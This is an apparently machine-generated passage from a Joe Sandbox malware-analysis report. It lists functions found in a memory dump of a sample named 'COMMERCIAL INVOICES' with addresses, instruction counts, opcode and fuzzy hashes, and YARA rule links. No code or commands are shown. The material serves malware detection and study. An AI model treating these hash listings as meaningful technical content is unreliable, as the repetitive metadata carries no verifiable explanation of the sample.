                                                                                                                                                                                                                                      • Opcode ID: f89bbfabaff2944a12535c17846e977a64dd82a0207392e4ed249ce835841378
                                                                                                                                                                                                                                      • Instruction ID: 8943e97317b2c30ec11813a0fd5f42dee4ff592a4298958d8e99b1d0007af15d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f89bbfabaff2944a12535c17846e977a64dd82a0207392e4ed249ce835841378
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 554183B1A21606CFCB19DF6DC9809ADB7F2FFD8320B14862AE566AB250D7349941CB50
                                                                                                                                                                                                                                      Function 012502E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                                                                      • Instruction ID: ced90da819e68c1c20145ed23f4fdad8e860138e05ff264eecae1e49ca936622
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1312831A20245BFDB529B68CC84BABBFE9AF14350F044165F815D7393C2B4D944CBA4
                                                                                                                                                                                                                                      Function 012EE3DB Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8c58d8f0ce56722c3f81327bce7461facb5d97d3938c90adb4e6ef0ce2757559
                                                                                                                                                                                                                                      • Instruction ID: b7cadb75dcd1ca0d1fc2ee62851a2b819b36ed97e04919b395a75f19e1c43e3c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c58d8f0ce56722c3f81327bce7461facb5d97d3938c90adb4e6ef0ce2757559
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD31A635760756ABD722AF659C95FBB76E9EB58B50F410028FA00AB2D1DAB4DC00C7A0
                                                                                                                                                                                                                                      Function 012F4B4B Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6a03a570abd671e91046d0cdd4e7da54bff751e9f08c63a68c542d907a9f69dc
                                                                                                                                                                                                                                      • Instruction ID: 7c84262ca304b9f7cc8e0e0fc7cd8865f9db3fef9344799b41b998250989f06e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a03a570abd671e91046d0cdd4e7da54bff751e9f08c63a68c542d907a9f69dc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8931E172625242DFC321EF19D881F26B7F9FB80360F09447EEA958B251D770A900CB94
                                                                                                                                                                                                                                      Function 01244260 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 81b6d7b9d709d6a3d6ec81fb36bb42ce903f4f74b361176516473c99575024e2
                                                                                                                                                                                                                                      • Instruction ID: 59ec97e3a0ed50c66bbc0d92f1b3be652ff5b956d535a05b1882d05e415739da
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81b6d7b9d709d6a3d6ec81fb36bb42ce903f4f74b361176516473c99575024e2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D41C071220B46DFD726DF28C481FEA7BE9BF55754F10842DEA998B250C770E804CB64
                                                                                                                                                                                                                                      Function 012F4BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4dc9a7d0c9ab1bc9f6c59657f57c980670ad11352211f7b63a1d0f0ac8171197
                                                                                                                                                                                                                                      • Instruction ID: 02386b51e6590de2bf2f7528e837e6d38ee61b5656e134100dadbdc5a9f84a8f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4dc9a7d0c9ab1bc9f6c59657f57c980670ad11352211f7b63a1d0f0ac8171197
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED31BC716242429FD320EF29C881F2BB7E9FB84720F05453DEB598B291E770E900CBA5
                                                                                                                                                                                                                                      Function 012BEB1D Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 87d6628bf6c441c902dbcb062c332d680bdea5b84562a3073d3acbb626a59505
                                                                                                                                                                                                                                      • Instruction ID: 3dc3bb95b8fd3805364fa9d8f3554b23af68b89ee1142233292fdc94237a82e0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87d6628bf6c441c902dbcb062c332d680bdea5b84562a3073d3acbb626a59505
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9231EA312216839BF322975DCDC8BE57BD4BF507C4F1E00A4AF46876D2EB68D840C225
                                                                                                                                                                                                                                      Function 013061C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 363952c864327500ad2d591e79113f442fd2dceda177e696e22be1b651a70029
                                                                                                                                                                                                                                      • Instruction ID: af408dd725116513161794c70fcbfb89633158caf1f386a2eecaf02793034ff5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 363952c864327500ad2d591e79113f442fd2dceda177e696e22be1b651a70029
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD31E675A00256ABDB16DF98CC51FBEB7F9FB44B44F454168E900AB284D770ED10CB94
                                                                                                                                                                                                                                      Function 012E483A Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 82535396958456fc679442cfee7f87c52af5a090da4f95af1749f7cf75e22ae9
                                                                                                                                                                                                                                      • Instruction ID: 8961f69928ee0881a2f03e30ec6fa0bb0f3ea3b121d9e13c6a18f3ea7a70590c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82535396958456fc679442cfee7f87c52af5a090da4f95af1749f7cf75e22ae9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56317536A5016DABCF21EF54DC88BDE7BF9AB98310F1000A5A908E7250CA30DE918F90
                                                                                                                                                                                                                                      Function 0126EB20 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c4a9dcd5d01b6cea491958516e8afd39b554f5231f3076b4426aa43b71f73692
                                                                                                                                                                                                                                      • Instruction ID: 2c72ad7ab46d94957a8e0b9d353fb2cc454121a8e8e7c4c62df37382c4414c1f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4a9dcd5d01b6cea491958516e8afd39b554f5231f3076b4426aa43b71f73692
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A31D576E20615AFDB21DFA9C840AAEBBBCFF04750F014425EA15E7290E6709E408BA0
                                                                                                                                                                                                                                      Function 013060B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7570f1f9f15822e8cc14acc9e287a1809fda99725ef816733012db643915b98d
                                                                                                                                                                                                                                      • Instruction ID: 27d4a33fad5ab05b3cafb4545dc06932a790775acc21c171643448cec8a73fca
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7570f1f9f15822e8cc14acc9e287a1809fda99725ef816733012db643915b98d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4731C2B1B40606EBDB179B99CC61A6AB7F9AF44758F004069E506EB386DA30DC108B90
                                                                                                                                                                                                                                      Function 012407AF Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ca2a4f734d02a910bf02f5dc214f4f29c69733a9587c7c7ea10790d56c408093
                                                                                                                                                                                                                                      • Instruction ID: e953ecd83a0924fd049b76e5b5fa9ce4c4eae21972a4162b4d60df6a15d7fb13
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca2a4f734d02a910bf02f5dc214f4f29c69733a9587c7c7ea10790d56c408093
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38314972A24702DBD716DE288880EBFBBA5AFD4250F014428FE5597300EA30DC4187E9
                                                                                                                                                                                                                                      Function 01248550 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5deb2f11f773139309fb9fda6f5ae040829333cad2da088fdcc744f2b44eb8a0
                                                                                                                                                                                                                                      • Instruction ID: 486ac0cbfa246d0fd5a9ce49d1fb243d3b6c066d55fb7d387ffdbcec7f4fb59e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5deb2f11f773139309fb9fda6f5ae040829333cad2da088fdcc744f2b44eb8a0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97317CB1629302CFE724CF59C840B2BBBE5FB98710F45496DEA8497255D770E848CB91
                                                                                                                                                                                                                                      Function 0127A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                                                                                      • Instruction ID: b429ba880844b66c7c07c7048af6c672151666dd4bf3c41d29ab24e720ccf6fa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1312E72B10701AFD765CF6DCD81B5BBBF8AB08750F08052DA65AC3650E630E900CB50
                                                                                                                                                                                                                                      Function 012EEBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9034b42f71873d2d8f847eb289dddf74c5a103e21d98f0103313df132b28a977
                                                                                                                                                                                                                                      • Instruction ID: 0df1a613d9ceed83a3da932e820edfd8bff35eb731999fa87ecd006d734c821c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9034b42f71873d2d8f847eb289dddf74c5a103e21d98f0103313df132b28a977
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D31DAB1515302DFC711DF19C48896ABBF1FF89208F8589AEF9889B351D331DA44CB96
                                                                                                                                                                                                                                      Function 0126438F Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 89b17e9dc27ff140769132952bfd286ccdb82f7609bc0a0ff79a2e1e6555d93d
                                                                                                                                                                                                                                      • Instruction ID: ceefde46c7cd371ff99eae68435d9b4371a56194a75c1da1dd69f4681a36063a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89b17e9dc27ff140769132952bfd286ccdb82f7609bc0a0ff79a2e1e6555d93d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2312631B202869FC724FFB8C882A6E7BFDEB84704F108529D581D7294D730D981CB90
                                                                                                                                                                                                                                      Function 0123CB7E Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                                                                                                      • Instruction ID: 451ac5a713f5def5c956169eb6e87446d4cbf3f7843184ed593c48d371416978
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB213472E6025BAADB00DBB98801BBFBBB5AF50740F0584369E15F7340E270D90087A4
                                                                                                                                                                                                                                      Function 0123C156 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4de20605849454baa15e8e5050a987bc1e84ca960d4aaeb1dd747c6b2024fcda
                                                                                                                                                                                                                                      • Instruction ID: be66ce598f51e6983e63c3f66653ed6fd2c5ddbe3f2875d48eeff589ef87baeb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4de20605849454baa15e8e5050a987bc1e84ca960d4aaeb1dd747c6b2024fcda
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24317DB15102059FDF35AF6CCC41BB97774EF40314F448169DE859B382DA74D982DB90
                                                                                                                                                                                                                                      Function 012FC3CD Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                                                                      • Instruction ID: 3ab2f1d66d5ebf4d8345cfd91e0ca5be3af08b0f97a1659c51c8e8978066fd68
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6210D3E62065AB6CB15ABA58C00EBBFBB5EF50710F40843EFB9587691E634D960C760
                                                                                                                                                                                                                                      Function 0123E420 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 18d8540a7e6a8ac323a267221736ab01b87c2c09f89d2b509b0fe5e31e10e7b7
                                                                                                                                                                                                                                      • Instruction ID: be9f9f195fc39cf4aa837bb7b2e1d6a9de397105eba843c661973007466f603e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18d8540a7e6a8ac323a267221736ab01b87c2c09f89d2b509b0fe5e31e10e7b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC310872A2112D9BDB31DF18DC41FEE77B9EB54740F0200A1E745A7290D6B09E848FA0
                                                                                                                                                                                                                                      Function 01274588 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                                                                                      • Instruction ID: 70232b4a55b37fcb19062899b00b9f0acfccf4a9ae4dea06d30c0427b7e8e220
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE219F76A10659EFCB11EF98C980A9FBBB9FF48314F108069EE159B241D670EE05CB90
                                                                                                                                                                                                                                      Function 012744B0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1ef2d503e612d1a54077997e92778a9cf4a10262ec62701f0942f270e88493b1
                                                                                                                                                                                                                                      • Instruction ID: 112599f299301088b010e35614a970e4fe7cfac38058414da8738b50fb0671b0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ef2d503e612d1a54077997e92778a9cf4a10262ec62701f0942f270e88493b1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4421C3726247969BC722EF18D881F6BB7E9FF98760F004519FE549B641D730E900CBA2
                                                                                                                                                                                                                                      Function 0123E388 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                                                                                      • Instruction ID: 687858912588ad68b4e077b2950490a936e6cb585c1f367b8737ecb3d31f27ea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C731CB71620605EFEB21DF68C984F6AB7F9FF84354F1144A8E6128B280E770EE02CB50
                                                                                                                                                                                                                                      Function 012BE609 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3d18f82280666cac04233c6e4f51bae4e235322c960e91c1b11b0518da1c9e78
                                                                                                                                                                                                                                      • Instruction ID: 33cef1e4f027423090677af4983d613d5e38d7fa4ad7a86998c8a6ac6f94a2d1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d18f82280666cac04233c6e4f51bae4e235322c960e91c1b11b0518da1c9e78
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C531C075A20206EFCB14DF1CC8859EEB7B9FF94350B16445AE80A9B391E770EA40CF94
                                                                                                                                                                                                                                      Function 012C06F1 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
